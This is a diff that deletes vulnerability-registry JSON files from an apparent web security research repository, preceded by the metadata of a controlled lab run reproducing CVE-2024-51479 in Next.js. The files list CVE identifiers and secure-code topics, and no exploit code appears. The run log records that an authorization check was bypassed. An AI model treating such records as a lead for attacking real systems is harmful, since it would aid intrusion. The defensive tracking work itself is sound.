{
"at": "2026-03-18T01:29:13+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:29:17+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:29:17+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "nextjs-nextjs--CVE-2024-51479-20260318012913"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side authorization recheck was bypassed"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:29:13+00:00",
"finished_at": "2026-03-18T01:29:17+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd"
}
}

20
08-threat-intel/registry/systems/adminer.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "adminer",
"display_name": "Adminer",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/adminer",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

22
08-threat-intel/registry/systems/adobe-commerce.json
查看文件

@@ -1,22 +0,0 @@
{
"system_id": "adobe-commerce",
"display_name": "Adobe Commerce",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/adobe-commerce",
"secure_code_topics": [
"authz-server-side-recheck",
"file-upload-validation",
"xss-output-encoding",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/angular.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "angular",
"display_name": "Angular",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/angular",
"secure_code_topics": [
"xss-output-encoding",
"template-injection-guard",
"csp-trusted-types"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/apache-httpd.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "apache-httpd",
"display_name": "Apache HTTP Server",
"category": "servers",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/apache-httpd",
"secure_code_topics": [
"request-smuggling-boundary",
"proxy-trust-boundary",
"path-traversal-guard"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/apache-tomcat.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "apache-tomcat",
"display_name": "Apache Tomcat",
"category": "servers",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/apache-tomcat",
"secure_code_topics": [
"request-smuggling-boundary",
"authz-server-side-recheck",
"path-traversal-guard"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/aspnet-core.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "aspnet-core",
"display_name": "ASP.NET Core",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/aspnet-core",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/astro.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "astro",
"display_name": "Astro",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/astro",
"secure_code_topics": [
"authz-server-side-recheck",
"csp-trusted-types"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/caddy.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "caddy",
"display_name": "Caddy",
"category": "servers",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/caddy",
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/directus.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "directus",
"display_name": "Directus",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/directus",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/discourse.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "discourse",
"display_name": "Discourse",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/discourse",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/django.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "django",
"display_name": "Django",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/django",
"secure_code_topics": [
"xss-output-encoding",
"path-traversal-guard",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

22
08-threat-intel/registry/systems/drupal.json
查看文件

@@ -1,22 +0,0 @@
{
"system_id": "drupal",
"display_name": "Drupal",
"category": "cms",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/drupal",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"file-upload-validation",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/echo.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "echo",
"display_name": "Echo",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/echo",
"secure_code_topics": [
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/esbuild.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "esbuild",
"display_name": "esbuild",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/esbuild",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/express.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "express",
"display_name": "Express",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/express",
"secure_code_topics": [
"xss-output-encoding",
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/fastify.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "fastify",
"display_name": "Fastify",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/fastify",
"secure_code_topics": [
"proxy-trust-boundary",
"ssrf-url-validation",
"xss-output-encoding"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/flask.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "flask",
"display_name": "Flask",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/flask",
"secure_code_topics": [
"xss-output-encoding",
"ssrf-url-validation",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/ghost.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "ghost",
"display_name": "Ghost",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/ghost",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/gin.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "gin",
"display_name": "Gin",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/gin",
"secure_code_topics": [
"proxy-trust-boundary",
"xss-output-encoding"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

59
08-threat-intel/registry/systems/gitea.json
查看文件

@@ -1,59 +0,0 @@
{
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"tier": "rolling-24m",
"total": 37,
"markdown_cases": 37,
"triage_count": 0,
"latest_update": "2026-03-03T04:57:57.697708Z",
"output_dir": "07-framework-security/platforms/gitea",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 1,
"manual_count": 36,
"items": [
"gitea--CVE-2026-0798",
"gitea--CVE-2026-20736",
"gitea--CVE-2026-20750",
"gitea--CVE-2026-20800",
"gitea--CVE-2026-20883",
"gitea--CVE-2026-20888",
"gitea--CVE-2026-20897",
"gitea--CVE-2026-20904",
"gitea--CVE-2026-20912",
"gitea--CVE-2025-69413",
"gitea--CVE-2025-68938",
"gitea--CVE-2025-68939",
"gitea--CVE-2025-68940",
"gitea--CVE-2025-68941",
"gitea--CVE-2025-68942",
"gitea--CVE-2025-68943",
"gitea--CVE-2025-68944",
"gitea--CVE-2025-68945",
"gitea--CVE-2025-68946",
"gitea--CVE-2022-42968",
"gitea--CVE-2021-45330",
"gitea--CVE-2018-18926",
"gitea--CVE-2020-13246",
"gitea--CVE-2021-28378",
"gitea--CVE-2022-0905",
"gitea--CVE-2022-1928",
"gitea--CVE-2022-27313",
"gitea--CVE-2022-30781",
"gitea--CVE-2021-29134",
"gitea--CVE-2021-45331",
"gitea--CVE-2021-45327",
"gitea--CVE-2022-38795",
"gitea--CVE-2018-15192",
"gitea--CVE-2019-1010261",
"gitea--CVE-2022-38183",
"gitea--CVE-2021-3382",
"gitea--CVE-2022-1058"
]
}

21
08-threat-intel/registry/systems/gitlab-ce.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "gitlab-ce",
"display_name": "GitLab CE",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/gitlab-ce",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"deserialization-safety"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/grafana.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "grafana",
"display_name": "Grafana",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/grafana",
"secure_code_topics": [
"authz-server-side-recheck",
"plugin-extension-trust-policy",
"xss-output-encoding"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/hapi.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "hapi",
"display_name": "Hapi",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/hapi",
"secure_code_topics": [
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/haproxy.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "haproxy",
"display_name": "HAProxy",
"category": "servers",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/haproxy",
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/jenkins.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "jenkins",
"display_name": "Jenkins",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/jenkins",
"secure_code_topics": [
"plugin-extension-trust-policy",
"authz-server-side-recheck",
"deserialization-safety"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

22
08-threat-intel/registry/systems/joomla.json
查看文件

@@ -1,22 +0,0 @@
{
"system_id": "joomla",
"display_name": "Joomla",
"category": "cms",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/joomla",
"secure_code_topics": [
"xss-output-encoding",
"file-upload-validation",
"path-traversal-guard",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/kibana.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "kibana",
"display_name": "Kibana",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/kibana",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"proxy-trust-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/koa.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "koa",
"display_name": "Koa",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/koa",
"secure_code_topics": [
"proxy-trust-boundary",
"ssrf-url-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/laravel.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "laravel",
"display_name": "Laravel",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/laravel",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/magento-open-source.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "magento-open-source",
"display_name": "Magento Open Source",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/magento-open-source",
"secure_code_topics": [
"authz-server-side-recheck",
"file-upload-validation",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/mattermost.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/mattermost",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/mediawiki.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "mediawiki",
"display_name": "MediaWiki",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/mediawiki",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/medusa.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "medusa",
"display_name": "Medusa",
"category": "ecommerce",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/medusa",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/moodle.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "moodle",
"display_name": "Moodle",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/moodle",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/nestjs.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "nestjs",
"display_name": "NestJS",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/nestjs",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"ssrf-url-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

48
08-threat-intel/registry/systems/nextjs.json
查看文件

@@ -1,48 +0,0 @@
{
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"tier": "history-full",
"total": 26,
"markdown_cases": 26,
"triage_count": 0,
"latest_update": "2026-03-13T22:14:13.665535Z",
"output_dir": "07-framework-security/frameworks/nextjs",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 26,
"items": [
"nextjs--GHSA-h25m-26qc-wcjf",
"nextjs--CVE-2025-59472",
"nextjs--CVE-2025-59471",
"nextjs--GHSA-5j59-xgg2-r9c4",
"nextjs--GHSA-w37m-7fhw-fmv9",
"nextjs--GHSA-mwv6-3258-q52c",
"nextjs--GHSA-9qr9-h5gf-34mp",
"nextjs--CVE-2025-57752",
"nextjs--CVE-2025-55173",
"nextjs--CVE-2025-57822",
"nextjs--CVE-2025-49826",
"nextjs--CVE-2025-49005",
"nextjs--CVE-2025-48068",
"nextjs--CVE-2025-32421",
"nextjs--CVE-2025-30218",
"nextjs--CVE-2025-29927",
"nextjs--CVE-2024-56332",
"nextjs--CVE-2024-51479",
"nextjs--CVE-2024-47831",
"nextjs--CVE-2024-46982",
"nextjs--CVE-2024-34351",
"nextjs--CVE-2021-43803",
"nextjs--CVE-2021-39178",
"nextjs--CVE-2021-37699",
"nextjs--CVE-2020-15242",
"nextjs--CVE-2020-5284"
]
}

21
08-threat-intel/registry/systems/nginx.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "nginx",
"display_name": "Nginx",
"category": "servers",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/nginx",
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary",
"csp-trusted-types"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/nodejs.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "nodejs",
"display_name": "Node.js",
"category": "frameworks",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/nodejs",
"secure_code_topics": [
"ssrf-url-validation",
"request-smuggling-boundary",
"dependency-upgrade-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/nuxt.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "nuxt",
"display_name": "Nuxt",
"category": "frameworks",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/nuxt",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/opencart.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "opencart",
"display_name": "OpenCart",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/opencart",
"secure_code_topics": [
"authz-server-side-recheck",
"plugin-extension-trust-policy",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

20
08-threat-intel/registry/systems/openmage.json
查看文件

@@ -1,20 +0,0 @@
{
"system_id": "openmage",
"display_name": "OpenMage / Mage-OS",
"category": "ecommerce",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/openmage",
"secure_code_topics": [
"authz-server-side-recheck",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/phpmyadmin.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "phpmyadmin",
"display_name": "phpMyAdmin",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/phpmyadmin",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck",
"path-traversal-guard"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

21
08-threat-intel/registry/systems/prestashop.json
查看文件

@@ -1,21 +0,0 @@
{
"system_id": "prestashop",
"display_name": "PrestaShop",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/prestashop",
"secure_code_topics": [
"plugin-extension-trust-policy",
"authz-server-side-recheck",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}

某些文件未显示,因为此 diff 中更改的文件太多 显示更多